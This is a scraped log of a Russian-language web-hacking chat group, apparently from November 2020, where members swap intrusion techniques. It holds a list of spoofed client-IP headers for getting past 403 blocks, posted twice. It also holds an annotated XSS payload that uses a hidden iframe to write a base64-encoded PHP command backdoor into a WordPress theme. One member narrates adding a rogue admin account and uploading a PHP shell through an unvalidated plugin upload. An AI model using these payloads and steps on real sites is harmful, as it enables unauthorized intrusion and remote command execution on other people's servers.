В рейтинге участвует:

групп:

каналов:

Виртуальный сервер на SSD - недорого!

Аренда выделенных и виртуальных серверов (VDS/VPS), хостинг, аренда IP-адресов, администрирование, круглосуточная поддержка

qwarta.ru подробнее

Резервное копирование с проверкой на вирусы!!!

Удобный сервис создания резервных копий на любой сервер сети интернет. Отслеживайте изменения, проверяйте на вирусы. Надежно защитите свой бизнес!

go.backupland.com

Выбираете сервер? Любая конфигурация на заказ!

Аренда физических серверов любых конфигураций под любые запросы - 1С бухгалтерия, игровые сервера, нагруженные проекты, интернет-магазины!

qwarta.ru подробнее

Size: a a a

WebPwnChat

1200 membersпожаловаться на группу
2020 November 22

MM

Maxim Maximov in WebPwnChat
Алексей
Попробовать хедеры проверить еще, может 403 можно будет обойти

Другие сайты/виртуальные хосты на айпи

К примеру -
CACHE_INFO: 127.0.0.1
CF_CONNECTING_IP: 127.0.0.1
CLIENT_IP: 127.0.0.1
COMING_FROM: 127.0.0.1
CONNECT_VIA_IP: 127.0.0.1
FORWARDED-FOR-IP: 127.0.0.1
FORWARDED-FOR: 127.0.0.1
FORWARDED: 127.0.0.1
FORWARDED_FOR: 127.0.0.1
FORWARDED_FOR_IP: 127.0.0.1
HTTP-CLIENT-IP: 127.0.0.1
HTTP-FORWARDED-FOR-IP: 127.0.0.1
HTTP-PC-REMOTE-ADDR: 127.0.0.1
HTTP-PROXY-CONNECTION: 127.0.0.1
HTTP-VIA: 127.0.0.1
HTTP-X-FORWARDED-FOR-IP: 127.0.0.1
HTTP-X-IMFORWARDS: 127.0.0.1
HTTP-XROXY-CONNECTION: 127.0.0.1
PC_REMOTE_ADDR: 127.0.0.1
PRAGMA: 127.0.0.1
PROXY: 127.0.0.1
PROXY_AUTHORIZATION: 127.0.0.1
PROXY_CONNECTION: 127.0.0.1
REMOTE_ADDR: 127.0.0.1
VIA: 127.0.0.1
X_CLUSTER_CLIENT_IP: 127.0.0.1
X_COMING_FROM: 127.0.0.1
X_DELEGATE_REMOTE_HOST: 127.0.0.1
X_FORWARDED: 127.0.0.1
X_FORWARDED_FOR: 127.0.0.1
X_FORWARDED_FOR_IP: 127.0.0.1
X_IMFORWARDS: 127.0.0.1
X_LOCKING: 127.0.0.1
X_LOOKING: 127.0.0.1
X_REAL_IP: 127.0.0.1
XONNECTION: 127.0.0.1
XPROXY: 127.0.0.1
XROXY_CONNECTION: 127.0.0.1
ZCACHE_CONTROL: 127.0.0.1
Годный список
источник
17:07пожаловаться#1

B

Bo🦠oM in WebPwnChat
Sergey Belov
правда я это рыщу в инсталяции @i_bo0om )))
источник
17:18пожаловаться#2

B

Bo🦠oM in WebPwnChat
Алексей
Попробовать хедеры проверить еще, может 403 можно будет обойти

Другие сайты/виртуальные хосты на айпи

К примеру -
CACHE_INFO: 127.0.0.1
CF_CONNECTING_IP: 127.0.0.1
CLIENT_IP: 127.0.0.1
COMING_FROM: 127.0.0.1
CONNECT_VIA_IP: 127.0.0.1
FORWARDED-FOR-IP: 127.0.0.1
FORWARDED-FOR: 127.0.0.1
FORWARDED: 127.0.0.1
FORWARDED_FOR: 127.0.0.1
FORWARDED_FOR_IP: 127.0.0.1
HTTP-CLIENT-IP: 127.0.0.1
HTTP-FORWARDED-FOR-IP: 127.0.0.1
HTTP-PC-REMOTE-ADDR: 127.0.0.1
HTTP-PROXY-CONNECTION: 127.0.0.1
HTTP-VIA: 127.0.0.1
HTTP-X-FORWARDED-FOR-IP: 127.0.0.1
HTTP-X-IMFORWARDS: 127.0.0.1
HTTP-XROXY-CONNECTION: 127.0.0.1
PC_REMOTE_ADDR: 127.0.0.1
PRAGMA: 127.0.0.1
PROXY: 127.0.0.1
PROXY_AUTHORIZATION: 127.0.0.1
PROXY_CONNECTION: 127.0.0.1
REMOTE_ADDR: 127.0.0.1
VIA: 127.0.0.1
X_CLUSTER_CLIENT_IP: 127.0.0.1
X_COMING_FROM: 127.0.0.1
X_DELEGATE_REMOTE_HOST: 127.0.0.1
X_FORWARDED: 127.0.0.1
X_FORWARDED_FOR: 127.0.0.1
X_FORWARDED_FOR_IP: 127.0.0.1
X_IMFORWARDS: 127.0.0.1
X_LOCKING: 127.0.0.1
X_LOOKING: 127.0.0.1
X_REAL_IP: 127.0.0.1
XONNECTION: 127.0.0.1
XPROXY: 127.0.0.1
XROXY_CONNECTION: 127.0.0.1
ZCACHE_CONTROL: 127.0.0.1
Надо современные от cdn добавить
источник
17:18пожаловаться#3

А

Алексей in WebPwnChat
Bo🦠oM
Надо современные от cdn добавить
Тема
источник
17:23пожаловаться#4

GS

Georgii Starostin in WebPwnChat
Sergey Belov
еще конечно оч наркомански, но точно сработает )) засунуть такой пэйлоад на страницы, достал из своих старых заметок

iframe name='evilframe' src='/wordpress/wp-admin/theme-editor.php?file=404.php&theme=twentythirteen' // создаём iframe с редактированием шаблона страницы 404 текущей темы (twentythirteen)
style='display:none'  //  делаем iframe невидимым
onload= // как только загрузился
if (evilframe.document.getElementById('newcontent').value.indexOf('system') == -1) // проверяем, что шаблон темы уже не содержит backdoor (вызов функции system)
evilframe.document.getElementById('newcontent').value += atob('PD9waHAgQHN5c3RlbSgkX0dFVFsnY21kJ10pOyA/Pg=='// добавляем к текущему значению темы код <?php @system($_GET['cmd']); ?>
evilframe.document.getElementById('submit').click() // сохраняем тему


и ждать админа х)
Дестроить увы нельзя((((
источник
17:25пожаловаться#5

SB

Sergey Belov in WebPwnChat
ну базу менять тоже такое))
источник
17:26пожаловаться#6

GS

Georgii Starostin in WebPwnChat
Sergey Belov
ну базу менять тоже такое))
А где я ее менял?))))
источник
17:49пожаловаться#7

SB

Sergey Belov in WebPwnChat
Georgii Starostin
А где я ее менял?))))
понял-принял)
источник
17:50пожаловаться#8

GS

Georgii Starostin in WebPwnChat
Я ж свою БД просто читаю чужим клиентом))))))
источник
17:51пожаловаться#9

TB

Thai Bo in WebPwnChat
Я как то не мог найти админку, нашёл через плагины которые пишут статистику переходов по страницам, там и нашёл
источник
18:13пожаловаться#10

GS

Georgii Starostin in WebPwnChat
Пролился через кастомный плагин)))))))
источник
19:30пожаловаться#11

GS

Georgii Starostin in WebPwnChat
Кривой аплоад найден)))))
источник
19:37пожаловаться#12

А

Алексей in WebPwnChat
Georgii Starostin
Кривой аплоад найден)))))
А как нашел, если не секрет?
источник
19:42пожаловаться#13

GS

Georgii Starostin in WebPwnChat
Внимательно почитал список таблиц, нашёл таблицу, которая не похожа на таблицу WP. Там оказались какие-то учетки. Создал админа ещё одного в этой таблице. В соседней таблице (тоже непохожей на дефолтную) нашёл путь попробовал его. Там оказалась ещё одна админка для какого-то внутреннего сервиса. Под админом ничего загружать было нельзя, но были видны заявки с файлами. Поменял права созданного пользователя на юзера. Появился функционал создания заявок с аплоадом. Загрузил PHP шелл. Ссылка на него сразу появилась в заявке. Открыл. Профит.
источник
19:58пожаловаться#14

GS

Georgii Starostin in WebPwnChat
Ну и теперь периметр можно считать пройденным окончательно.
источник
20:01пожаловаться#15

BF

Billy Fox in WebPwnChat
Georgii Starostin
Внимательно почитал список таблиц, нашёл таблицу, которая не похожа на таблицу WP. Там оказались какие-то учетки. Создал админа ещё одного в этой таблице. В соседней таблице (тоже непохожей на дефолтную) нашёл путь попробовал его. Там оказалась ещё одна админка для какого-то внутреннего сервиса. Под админом ничего загружать было нельзя, но были видны заявки с файлами. Поменял права созданного пользователя на юзера. Появился функционал создания заявок с аплоадом. Загрузил PHP шелл. Ссылка на него сразу появилась в заявке. Открыл. Профит.
Интересная уязвимость
источник
20:03пожаловаться#16

WS

Web Security in WebPwnChat
Georgii Starostin
Внимательно почитал список таблиц, нашёл таблицу, которая не похожа на таблицу WP. Там оказались какие-то учетки. Создал админа ещё одного в этой таблице. В соседней таблице (тоже непохожей на дефолтную) нашёл путь попробовал его. Там оказалась ещё одна админка для какого-то внутреннего сервиса. Под админом ничего загружать было нельзя, но были видны заявки с файлами. Поменял права созданного пользователя на юзера. Появился функционал создания заявок с аплоадом. Загрузил PHP шелл. Ссылка на него сразу появилась в заявке. Открыл. Профит.
Бэкдор в плагине?
источник
20:16пожаловаться#17

GS

Georgii Starostin in WebPwnChat
Web Security
Бэкдор в плагине?
Криво реализованный функционал самописного плагина. Файлы не проверяются ни на что перед загрузкой + каталог доступен по http и с правом выполнения php скриптов.
источник
20:18пожаловаться#18

GS

Georgii Starostin in WebPwnChat
Этот плагин похоже полный самопис и написан под конкретную лавочку (не публичный скорее всего). И да, явно писали школолокодеры судя по стилю кода. Вебстудия все за 50.
источник
20:20пожаловаться#19
2020 November 23

1

1.4.7/12 in WebPwnChat
Норм
источник
07:53пожаловаться#20